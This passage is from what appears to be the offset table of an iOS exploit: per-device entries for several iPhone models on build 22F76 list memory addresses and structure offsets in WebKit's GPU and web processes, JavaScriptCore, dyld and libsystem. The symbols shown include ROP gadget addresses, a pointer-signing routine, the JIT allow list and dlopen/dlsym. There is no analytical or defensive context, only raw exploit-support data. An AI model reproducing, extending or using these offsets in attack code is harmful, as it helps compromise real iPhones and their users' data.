1876 libdyld__dlopen: 0x1ad8707b8n, 1877 libdyld__dlsym: 0x1ad871a34n, 1878 libdyld__gAPIs: 0x1ed5bc000n, 1879 libsystem_c__atexit_mutex: 0x1ed8cef58n, 1880 libsystem_kernel__thread_suspend: 0x1d3da91c0n, 1881 libsystem_pthread_base: 0x20d2ac000n, 1882 m_backend: 0x70n, 1883 m_drawingArea: 0x50n, 1884 m_gpuProcessConnection: 0x158n, 1885 m_gpuProcessConnection_m_identifier: 0x38n, 1886 m_imageBuffer: 0x18n, 1887 m_isRenderingSuspended: 0xe8n, 1888 m_platformContext: 0x38n, 1889 m_remoteDisplayLists: 0x70n, 1890 m_remoteRenderingBackendMap: 0xe8n, 1891 m_webProcessConnections: 0x80n, 1892 mach_task_self_ptr: 0x1ed8ce1c0n, 1893 mainRunLoop: 0x1edb30020n, 1894 privateState_off: 0x7e8n, 1895 pthread_create_jsc: 0x19bd2af30n, 1896 pthread_create_offset: 0x6988n, 1897 runLoopHolder_tid: 0x1edb40708n, 1898 rxBufferMtl_off: 0x100n, 1899 rxMtlBuffer_off: 0x70n, 1900 vertexAttribVector_off: 0x2548n 1901 }, 1902 "iPhone15,5_22F76": { 1903 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edae3798n, 1904 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edae3280n, 1905 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edae31e0n, 1906 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edae3230n, 1907 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edae2628n, 1908 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195f658n, 1909 AXCoreUtilities__DefaultLoader: 0x1eb7c0be0n, 1910 CAPointer: 0x20n, 1911 CFNetwork__gConstantCFStringValueTable: 0x1ee9366e0n, 1912 CGContextDelegate: 0x28n, 1913 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ee428n, 1914 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ee580n, 1915 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3bdcb8n, 1916 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3be1e4n, 1917 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3be748n, 1918 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3be304n, 1919 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80b1898n, 1920 DesktopServicesPriv_bss: 0x1ecca7a08n, 1921 Foundation__NSBundleTables_bundleTables_value: 0x1ed8f0348n, 1922 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 1923 GPUProcess_singleton: 0x1eb928a98n, 1924 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f7bc0n, 1925 HOMEUI_cstring: 0x182f79636n, 1926 IOSurfaceContextDelegate: 0x120n, 1927 IOSurfaceDrawable: 0x150n, 1928 IOSurfaceQueue: 0x48n, 1929 ImageIO__IIOLoadCMPhotoSymbols: 0x18865582cn, 1930 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9c2cb0n, 1931 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9c2960n, 1932 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9c2968n, 1933 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9c2970n, 1934 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9c28b0n, 1935 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9c2978n, 1936 ImageIO__gImageIOLogProc: 0x1ee9c0960n, 1937 JavaScriptCore__globalFuncParseFloat: 0x19a8755ecn, 1938 JavaScriptCore__jitAllowList: 0x1edb424a0n, 1939 JavaScriptCore__jitAllowList_once: 0x1edb422b8n, 1940 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac3d744n, 1941 PerfPowerServicesReader_cstring: 0x257f2fe60n, 1942 RemoteGraphicsContextGLWorkQueue: 0x1eda62f18n, 1943 RemoteRenderingBackendProxy_off: 0x830n, 1944 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5db688n, 1945 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5ef958n, 1946 Security__gSecurityd: 0x1eb683d78n, 1947 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd91288n, 1948 UI_m_connection: 0x28n, 1949 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f1380f70n, 1950 WebCore__PAL_getPKContactClass: 0x1eda67178n, 1951 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb922ed0n, 1952 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8ddac8n, 1953 WebCore__initPKContact_once: 0x1eda6fcb8n, 1954 WebCore__initPKContact_value: 0x1eda6fcc0n, 1955 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6e480n, 1956 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6e478n, 1957 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6e460n, 1958 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb4c548n, 1959 WebProcess_ensureGPUProcessConnection: 0x199199958n, 1960 WebProcess_gpuProcessConnectionClosed: 0x199aec2fcn, 1961 WebProcess_singleton: 0x1eda640c0n, 1962 __pthread_head: 0x269eb0020n, 1963 dyld__RuntimeState_emptySlot: 0x1a9a79b6cn, 1964 dyld__RuntimeState_vtable: 0x1f2875aa0n, 1965 dyld__dlopen_from_lambda_ret: 0x1a9a37fc8n, 1966 dyld__signPointer: 0x1a9a433e4n, 1967 emptyString: 0x1edb18420n, 1968 free_slabs: 0x1ed9a9a90n, 1969 gadget_control_1_ios184: 0x23f1202ecn, 1970 gadget_control_2_ios184: 0x1ad86ec28n, 1971 gadget_control_3_ios184: 0x21f289150n, 1972 gadget_loop_1_ios184: 0x1865fc18cn, 1973 gadget_loop_2_ios184: 0x20d25dda8n, 1974 gadget_loop_3_ios184: 0x184d2df1cn, 1975 gadget_set_all_registers_ios184: 0x20dfd616cn, 1976 jsc_base: 0x19a45e000n, 1977 libARI_cstring: 0x218ae7820n, 1978 libGPUCompilerImplLazy__invoker: 0x23cec57e8n, 1979 libGPUCompilerImplLazy_cstring: 0x23c00f870n, 1980 libdyld__dlopen: 0x1ad8707b8n, 1981 libdyld__dlsym: 0x1ad871a34n, 1982 libdyld__gAPIs: 0x1ed5bc000n, 1983 libsystem_c__atexit_mutex: 0x1ed8cef58n, 1984 libsystem_kernel__thread_suspend: 0x1d3da91c0n, 1985 libsystem_pthread_base: 0x20d2ac000n, 1986 m_backend: 0x70n, 1987 m_drawingArea: 0x50n, 1988 m_gpuProcessConnection: 0x158n, 1989 m_gpuProcessConnection_m_identifier: 0x38n, 1990 m_imageBuffer: 0x18n, 1991 m_isRenderingSuspended: 0xe8n, 1992 m_platformContext: 0x38n, 1993 m_remoteDisplayLists: 0x70n, 1994 m_remoteRenderingBackendMap: 0xe8n, 1995 m_webProcessConnections: 0x80n, 1996 mach_task_self_ptr: 0x1ed8ce1c0n, 1997 mainRunLoop: 0x1edb30020n, 1998 privateState_off: 0x7e8n, 1999 pthread_create_jsc: 0x19bd2af30n, 2000 pthread_create_offset: 0x6988n, 2001 runLoopHolder_tid: 0x1edb40708n, 2002 rxBufferMtl_off: 0x100n, 2003 rxMtlBuffer_off: 0x70n, 2004 vertexAttribVector_off: 0x2548n 2005 }, 2006 "iPhone16,1_22F76": { 2007 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edae38d8n, 2008 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edae33c0n, 2009 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edae3320n, 2010 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edae3370n, 2011 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edae2768n, 2012 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195f658n, 2013 AXCoreUtilities__DefaultLoader: 0x1eb7c0be0n, 2014 CAPointer: 0x20n, 2015 CFNetwork__gConstantCFStringValueTable: 0x1ee9366e0n, 2016 CGContextDelegate: 0x28n, 2017 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ee428n, 2018 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ee580n, 2019 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3bdcb8n, 2020 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3be1e4n, 2021 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3be748n, 2022 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3be304n, 2023 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80b1898n, 2024 DesktopServicesPriv_bss: 0x1ecca7a08n, 2025 Foundation__NSBundleTables_bundleTables_value: 0x1ed8f0488n, 2026 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 2027 GPUProcess_singleton: 0x1eb928a98n, 2028 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f7bc0n, 2029 HOMEUI_cstring: 0x182f79636n, 2030 IOSurfaceContextDelegate: 0x120n, 2031 IOSurfaceDrawable: 0x150n, 2032 IOSurfaceQueue: 0x48n, 2033 ImageIO__IIOLoadCMPhotoSymbols: 0x18865582cn, 2034 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9c2df0n, 2035 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9c2aa0n, 2036 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9c2aa8n, 2037 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9c2ab0n, 2038 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9c29f0n, 2039 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9c2ab8n, 2040 ImageIO__gImageIOLogProc: 0x1ee9c0960n, 2041 JavaScriptCore__globalFuncParseFloat: 0x19a8755ecn, 2042 JavaScriptCore__jitAllowList: 0x1edb424a0n, 2043 JavaScriptCore__jitAllowList_once: 0x1edb422b8n, 2044 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac3d744n, 2045 PerfPowerServicesReader_cstring: 0x2586dae60n, 2046 RemoteGraphicsContextGLWorkQueue: 0x1eda63058n, 2047 RemoteRenderingBackendProxy_off: 0x830n, 2048 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5db688n, 2049 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5ef958n, 2050 Security__gSecurityd: 0x1eb683d78n, 2051 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd91288n, 2052 UI_m_connection: 0x28n, 2053 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f1380f70n, 2054 WebCore__PAL_getPKContactClass: 0x1eda672b8n, 2055 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb922ed0n, 2056 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8ddac8n, 2057 WebCore__initPKContact_once: 0x1eda6fdf8n, 2058 WebCore__initPKContact_value: 0x1eda6fe00n, 2059 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6e5c0n, 2060 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6e5b8n, 2061 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6e5a0n, 2062 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb4c548n, 2063 WebProcess_ensureGPUProcessConnection: 0x199199958n, 2064 WebProcess_gpuProcessConnectionClosed: 0x199aec2fcn, 2065 WebProcess_singleton: 0x1eda64200n, 2066 __pthread_head: 0x26ad8c020n, 2067 dyld__RuntimeState_emptySlot: 0x1a9a79b6cn, 2068 dyld__RuntimeState_vtable: 0x1f2875aa0n, 2069 dyld__dlopen_from_lambda_ret: 0x1a9a37fc8n, 2070 dyld__signPointer: 0x1a9a433e4n, 2071 emptyString: 0x1edb18420n, 2072 free_slabs: 0x1ed9a9bd0n, 2073 gadget_control_1_ios184: 0x23f1202ecn, 2074 gadget_control_2_ios184: 0x1ad86ec28n, 2075 gadget_control_3_ios184: 0x21f28d150n, 2076 gadget_loop_1_ios184: 0x1865fc18cn, 2077 gadget_loop_2_ios184: 0x20d261da8n, 2078 gadget_loop_3_ios184: 0x184d2df1cn, 2079 gadget_set_all_registers_ios184: 0x20dfda16cn, 2080 jsc_base: 0x19a45e000n, 2081 libARI_cstring: 0x218aeb820n, 2082 libGPUCompilerImplLazy__invoker: 0x23cec57e8n, 2083 libGPUCompilerImplLazy_cstring: 0x23c00f870n, 2084 libdyld__dlopen: 0x1ad8707b8n, 2085 libdyld__dlsym: 0x1ad871a34n, 2086 libdyld__gAPIs: 0x1ed5bc000n, 2087 libsystem_c__atexit_mutex: 0x1ed8cf098n, 2088 libsystem_kernel__thread_suspend: 0x1d3da91c0n, 2089 libsystem_pthread_base: 0x20d2b0000n, 2090 m_backend: 0x70n, 2091 m_drawingArea: 0x50n, 2092 m_gpuProcessConnection: 0x158n, 2093 m_gpuProcessConnection_m_identifier: 0x38n, 2094 m_imageBuffer: 0x18n, 2095 m_isRenderingSuspended: 0xe8n, 2096 m_platformContext: 0x38n, 2097 m_remoteDisplayLists: 0x70n, 2098 m_remoteRenderingBackendMap: 0xe8n, 2099 m_webProcessConnections: 0x80n, 2100 mach_task_self_ptr: 0x1ed8ce300n, 2101 mainRunLoop: 0x1edb30020n, 2102 privateState_off: 0x7e8n, 2103 pthread_create_jsc: 0x19bd2af30n, 2104 pthread_create_offset: 0x6988n, 2105 runLoopHolder_tid: 0x1edb40708n, 2106 rxBufferMtl_off: 0x100n, 2107 rxMtlBuffer_off: 0x70n, 2108 vertexAttribVector_off: 0x2548n 2109 }, 2110 "iPhone16,2_22F76": { 2111 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edae38d8n, 2112 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edae33c0n, 2113 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edae3320n, 2114 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edae3370n, 2115 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edae2768n, 2116 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195f658n, 2117 AXCoreUtilities__DefaultLoader: 0x1eb7c0be0n, 2118 CAPointer: 0x20n, 2119 CFNetwork__gConstantCFStringValueTable: 0x1ee9366e0n, 2120 CGContextDelegate: 0x28n, 2121 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ee428n, 2122 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ee580n, 2123 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3bdcb8n, 2124 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3be1e4n, 2125 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3be748n, 2126 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3be304n, 2127 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80b1898n, 2128 DesktopServicesPriv_bss: 0x1ecca7a08n, 2129 Foundation__NSBundleTables_bundleTables_value: 0x1ed8f0488n, 2130 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 2131 GPUProcess_singleton: 0x1eb928a98n, 2132 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f7bc0n, 2133 HOMEUI_cstring: 0x182f79636n, 2134 IOSurfaceContextDelegate: 0x120n, 2135 IOSurfaceDrawable: 0x150n, 2136 IOSurfaceQueue: 0x48n, 2137 ImageIO__IIOLoadCMPhotoSymbols: 0x18865582cn, 2138 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9c2df0n, 2139 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9c2aa0n, 2140 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9c2aa8n, 2141 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9c2ab0n, 2142 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9c29f0n, 2143 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9c2ab8n, 2144 ImageIO__gImageIOLogProc: 0x1ee9c0960n, 2145 JavaScriptCore__globalFuncParseFloat: 0x19a8755ecn, 2146 JavaScriptCore__jitAllowList: 0x1edb424a0n, 2147 JavaScriptCore__jitAllowList_once: 0x1edb422b8n, 2148 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac3d744n, 2149 PerfPowerServicesReader_cstring: 0x2586dae60n, 2150 RemoteGraphicsContextGLWorkQueue: 0x1eda63058n, 2151 RemoteRenderingBackendProxy_off: 0x830n, 2152 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5db688n, 2153 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5ef958n, 2154 Security__gSecurityd: 0x1eb683d78n, 2155 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd91288n, 2156 UI_m_connection: 0x28n, 2157 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f1380f70n, 2158 WebCore__PAL_getPKContactClass: 0x1eda672b8n, 2159 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb922ed0n, 2160 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8ddac8n, 2161 WebCore__initPKContact_once: 0x1eda6fdf8n, 2162 WebCore__initPKContact_value: 0x1eda6fe00n, 2163 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6e5c0n, 2164 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6e5b8n, 2165 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6e5a0n, 2166 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb4c548n, 2167 WebProcess_ensureGPUProcessConnection: 0x199199958n, 2168 WebProcess_gpuProcessConnectionClosed: 0x199aec2fcn, 2169 WebProcess_singleton: 0x1eda64200n, 2170 __pthread_head: 0x26ad8c020n, 2171 dyld__RuntimeState_emptySlot: 0x1a9a79b6cn, 2172 dyld__RuntimeState_vtable: 0x1f2875aa0n, 2173 dyld__dlopen_from_lambda_ret: 0x1a9a37fc8n, 2174 dyld__signPointer: 0x1a9a433e4n, 2175 emptyString: 0x1edb18420n, 2176 free_slabs: 0x1ed9a9bd0n, 2177 gadget_control_1_ios184: 0x23f1202ecn, 2178 gadget_control_2_ios184: 0x1ad86ec28n, 2179 gadget_control_3_ios184: 0x21f28d150n, 2180 gadget_loop_1_ios184: 0x1865fc18cn, 2181 gadget_loop_2_ios184: 0x20d261da8n, 2182 gadget_loop_3_ios184: 0x184d2df1cn, 2183 gadget_set_all_registers_ios184: 0x20dfda16cn, 2184 jsc_base: 0x19a45e000n, 2185 libARI_cstring: 0x218aeb820n, 2186 libGPUCompilerImplLazy__invoker: 0x23cec57e8n, 2187 libGPUCompilerImplLazy_cstring: 0x23c00f870n, 2188 libdyld__dlopen: 0x1ad8707b8n, 2189 libdyld__dlsym: 0x1ad871a34n, 2190 libdyld__gAPIs: 0x1ed5bc000n, 2191 libsystem_c__atexit_mutex: 0x1ed8cf098n, 2192 libsystem_kernel__thread_suspend: 0x1d3da91c0n, 2193 libsystem_pthread_base: 0x20d2b0000n, 2194 m_backend: 0x70n, 2195 m_drawingArea: 0x50n, 2196 m_gpuProcessConnection: 0x158n, 2197 m_gpuProcessConnection_m_identifier: 0x38n, 2198 m_imageBuffer: 0x18n, 2199 m_isRenderingSuspended: 0xe8n, 2200 m_platformContext: 0x38n, 2201 m_remoteDisplayLists: 0x70n, 2202 m_remoteRenderingBackendMap: 0xe8n, 2203 m_webProcessConnections: 0x80n, 2204 mach_task_self_ptr: 0x1ed8ce300n, 2205 mainRunLoop: 0x1edb30020n, 2206 privateState_off: 0x7e8n, 2207 pthread_create_jsc: 0x19bd2af30n, 2208 pthread_create_offset: 0x6988n, 2209 runLoopHolder_tid: 0x1edb40708n, 2210 rxBufferMtl_off: 0x100n, 2211 rxMtlBuffer_off: 0x70n, 2212 vertexAttribVector_off: 0x2548n 2213 }, 2214 "iPhone17,1_22F76": { 2215 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edae38d8n, 2216 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edae33c0n, 2217 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edae3320n, 2218 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edae3370n, 2219 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edae2768n, 2220 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195f658n, 2221 AXCoreUtilities__DefaultLoader: 0x1eb7c0be0n, 2222 CAPointer: 0x20n, 2223 CFNetwork__gConstantCFStringValueTable: 0x1ee9366e0n, 2224 CGContextDelegate: 0x28n, 2225 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ee428n, 2226 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ee580n, 2227 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3bdcb8n, 2228 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3be1e4n, 2229 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3be748n, 2230 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3be304n, 2231 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80b1898n, 2232 DesktopServicesPriv_bss: 0x1ecca7a08n, 2233 Foundation__NSBundleTables_bundleTables_value: 0x1ed8f0488n, 2234 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 2235 GPUProcess_singleton: 0x1eb928a98n, 2236 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f7bc0n, 2237 HOMEUI_cstring: 0x182f79636n, 2238 IOSurfaceContextDelegate: 0x120n, 2239 IOSurfaceDrawable: 0x150n, 2240 IOSurfaceQueue: 0x48n, 2241 ImageIO__IIOLoadCMPhotoSymbols: 0x18865582cn, 2242 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9c2df0n, 2243 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9c2aa0n, 2244 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9c2aa8n, 2245 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9c2ab0n, 2246 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9c29f0n, 2247 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9c2ab8n, 2248 ImageIO__gImageIOLogProc: 0x1ee9c0960n, 2249 JavaScriptCore__globalFuncParseFloat: 0x19a8755ecn, 2250 JavaScriptCore__jitAllowList: 0x1edb424a0n, 2251 JavaScriptCore__jitAllowList_once: 0x1edb422b8n, 2252 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac3d744n, 2253 PerfPowerServicesReader_cstring: 0x257fc3e60n, 2254 RemoteGraphicsContextGLWorkQueue: 0x1eda63058n, 2255 RemoteRenderingBackendProxy_off: 0x830n, 2256 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5db688n, 2257 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5ef958n, 2258 Security__gSecurityd: 0x1eb683d78n, 2259 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd91288n, 2260 UI_m_connection: 0x28n, 2261 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f1380f70n, 2262 WebCore__PAL_getPKContactClass: 0x1eda672b8n, 2263 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb922ed0n, 2264 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8ddac8n, 2265 WebCore__initPKContact_once: 0x1eda6fdf8n, 2266 WebCore__initPKContact_value: 0x1eda6fe00n, 2267 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6e5c0n, 2268 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6e5b8n, 2269 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6e5a0n, 2270 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb4c548n, 2271 WebProcess_ensureGPUProcessConnection: 0x199199958n, 2272 WebProcess_gpuProcessConnectionClosed: 0x199aec2fcn, 2273 WebProcess_singleton: 0x1eda64200n, 2274 __pthread_head: 0x26a66c020n, 2275 dyld__RuntimeState_emptySlot: 0x1a9a79b6cn, 2276 dyld__RuntimeState_vtable: 0x1f2875aa0n, 2277 dyld__dlopen_from_lambda_ret: 0x1a9a37fc8n, 2278 dyld__signPointer: 0x1a9a433e4n, 2279 emptyString: 0x1edb18420n, 2280 free_slabs: 0x1ed9a9bd0n, 2281 gadget_control_1_ios184: 0x23f1202ecn, 2282 gadget_control_2_ios184: 0x1ad86ec28n, 2283 gadget_control_3_ios184: 0x21f28d150n, 2284 gadget_loop_1_ios184: 0x1865fc18cn, 2285 gadget_loop_2_ios184: 0x20d261da8n, 2286 gadget_loop_3_ios184: 0x184d2df1cn, 2287 gadget_set_all_registers_ios184: 0x20dfda16cn, 2288 jsc_base: 0x19a45e000n, 2289 libARI_cstring: 0x218aeb820n, 2290 libGPUCompilerImplLazy__invoker: 0x23cec57e8n, 2291 libGPUCompilerImplLazy_cstring: 0x23c00f870n, 2292 libdyld__dlopen: 0x1ad8707b8n, 2293 libdyld__dlsym: 0x1ad871a34n, 2294 libdyld__gAPIs: 0x1ed5bc000n, 2295 libsystem_c__atexit_mutex: 0x1ed8cf098n, 2296 libsystem_kernel__thread_suspend: 0x1d3da91c0n, 2297 libsystem_pthread_base: 0x20d2b0000n, 2298 m_backend: 0x70n, 2299 m_drawingArea: 0x50n, 2300 m_gpuProcessConnection: 0x158n, 2301 m_gpuProcessConnection_m_identifier: 0x38n, 2302 m_imageBuffer: 0x18n, 2303 m_isRenderingSuspended: 0xe8n, 2304 m_platformContext: 0x38n, 2305 m_remoteDisplayLists: 0x70n, 2306 m_remoteRenderingBackendMap: 0xe8n, 2307 m_webProcessConnections: 0x80n, 2308 mach_task_self_ptr: 0x1ed8ce300n, 2309 mainRunLoop: 0x1edb30020n, 2310 privateState_off: 0x7e8n, 2311 pthread_create_jsc: 0x19bd2af30n, 2312 pthread_create_offset: 0x6988n, 2313 runLoopHolder_tid: 0x1edb40708n, 2314 rxBufferMtl_off: 0x100n, 2315 rxMtlBuffer_off: 0x70n, 2316 vertexAttribVector_off: 0x2548n 2317 }, 2318 "iPhone17,2_22F76": { 2319 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edae38d8n, 2320 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edae33c0n, 2321 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edae3320n, 2322 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edae3370n, 2323 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edae2768n, 2324 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195f658n, 2325 AXCoreUtilities__DefaultLoader: 0x1eb7c0be0n, 2326 CAPointer: 0x20n, 2327 CFNetwork__gConstantCFStringValueTable: 0x1ee9366e0n, 2328 CGContextDelegate: 0x28n, 2329 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ee428n, 2330 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ee580n, 2331 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3bdcb8n, 2332 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3be1e4n, 2333 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3be748n, 2334 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3be304n, 2335 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80b1898n, 2336 DesktopServicesPriv_bss: 0x1ecca7a08n, 2337 Foundation__NSBundleTables_bundleTables_value: 0x1ed8f0488n, 2338 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 2339 GPUProcess_singleton: 0x1eb928a98n, 2340 GetCurrentThreadTLSIndex_CurrentThreadIndex: 